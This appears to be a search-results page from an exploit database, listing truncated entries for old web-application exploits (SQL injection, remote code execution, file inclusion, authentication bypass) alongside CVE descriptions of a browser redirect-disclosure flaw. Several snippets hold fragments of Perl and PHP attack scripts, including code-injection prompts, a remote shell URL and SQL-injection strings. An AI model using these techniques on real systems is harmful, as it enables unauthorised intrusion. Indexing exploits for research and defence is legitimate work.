104 matches found
Commix - Automated All-in-One OS Command Injection and Exploitation Tool
Commix short for command injection exploiter has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, ...
VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit
No description provided by source. html head titleVHCS version = 2.4.7.1 PoC. By RoMaNSoFt/title script language=JavaScript function submitform if document.adminadduser.username.value=='admin' alert'Learn to read before launching an exploit, script-kiddie!'; exit;...
Joomla Component joomlaXplorer <= 1.6.2 - Remote Vulnerabilities
No description provided by source. ------------------------------------------------------------- ----- H-T Team HouSSaMix + ToXiC350 from MoroCCo -------- ------------------------------------------------------------- = Author : HouSSaMix = Script : Joomla and Mambo Component joomlaxplorer = versi...
Oracle Forms and Reports 11.1 - Remote Exploit
No description provided by source. !/usr/bin/env ruby Exploit Title: Oracle Reports 11.1 About: Automated exploit for CVE-2012-3153/CVE-2012-3152 Google Dork: inurl:/reports/rwservlet/ Date: 01/28/2014 Exploit Author: Mekanismen [email protected] Credits to: @misssudo for initial disclosure...
SN News 1.2 - 'visualiza.php' SQL Injection
\n"; echo "Example:\n"; echo "php $argv0 http://www.website.com/snnews\n"; exit; $target = $argv1; ifsubstr$target, strlen$target-1!="/" $target .= "/"; $inject = $target . "visualiza.php?id=-0'%20"; $token = uniqid; $tokenhex = hex$token; echo " Trying to get informations...\n"; $infos =...
Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit PoC: index.php?section=shop&productId=VALID productid and YOUR BLIND SQL CODE Exploit tested on: Debian 6, Ubuntu Linux 11.04 Exploit found and written by: Penguin Version: = [email protected] !/usr/bin/php...
CVE-2010-0648
Mozilla Firefox, possibly before 3.6, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets0.href property value, relate...
CVE-2010-0315
WebKit before r53607, as used in Google Chrome before 4.0.249.89, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the...
CVE-2010-0314
Apple Safari allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets0.href property value...
CVE-2010-0314
Apple Safari allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets0.href property value...
CVE-2010-0314
The connected SSV entry (SSV:19008) documents CVE-2010-0314 as a redirect-target disclosure in Apple Safari: if a site URL is placed in the HREF of a stylesheet LINK element, a user’s session can read document.styleSheets[0].href to reveal the redirect URL. It notes Safari 4.0.4 and describes the...
BaBB 2.8 Code Injection
!usr/bin/python BaBB 2.8 Full Code Injection Exploit AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm Sina Yazdanmehr Download :...
Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit
No description provided by source. !/usr/bin/perl -w Winn ASP Guestbook 1.01 Beta Database Disclosure Exploit Found By : ZoRLu Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz...
TorrentTrader Classic 1.04 - Blind SQL Injection
TorrentTrader Classic 1.04 - Blind SQL Injection ====================================================== == TorrentTrader Classic NamE : TorrentTrader Classic == version : 1.04 == Download : www.torrenttrader.org ====================================================== == AuThOr : BazOka-HaCkEr ==...
PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution
Date: 02/07/08 Note I modified a bit phpsploit for this exploit, because PHP Nuke plays with REQUESTURI var ... Requirements registerglobals=On phpreter phpreter is really easy to use: You can change mode using "mode=", with = sql, php or cmd If you want to understand how it work ... read the cod...
dbhcms-rfi.txt
!/usr/bin/perl DBHcms $shellurl = "http://localhost/s.txt"; print " DBHcms ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? "; chomp$code=; $code = s/|new; $ua-timeout10; $ua-envproxy; $response = $ua-post$target,...
openrealty-exec.txt
!/usr/bin/perl Vendor url: www.open-realty.org note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Open-Realty ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? ";...
journalness-exec.txt
!/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to...
Journalness 4.1 - last_module Remote Code Execution
Journalness 4.1 - lastmodule Remote Code Execution !/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target;...
phpEventCalendar <= 0.2.3 (eventdisplay.php) SQL Injection Exploit
No description provided by source. !/usr/bin/perl Vendor url: www.ikemcg.com require LWP::UserAgent; print " phpEventCalendar = v0.2.3 SQL Injection Exploit By Iron - ironwarez.info Thanks to Silentz for the help : Greets to everyone at RootShell Security Group & dHack Example target url:...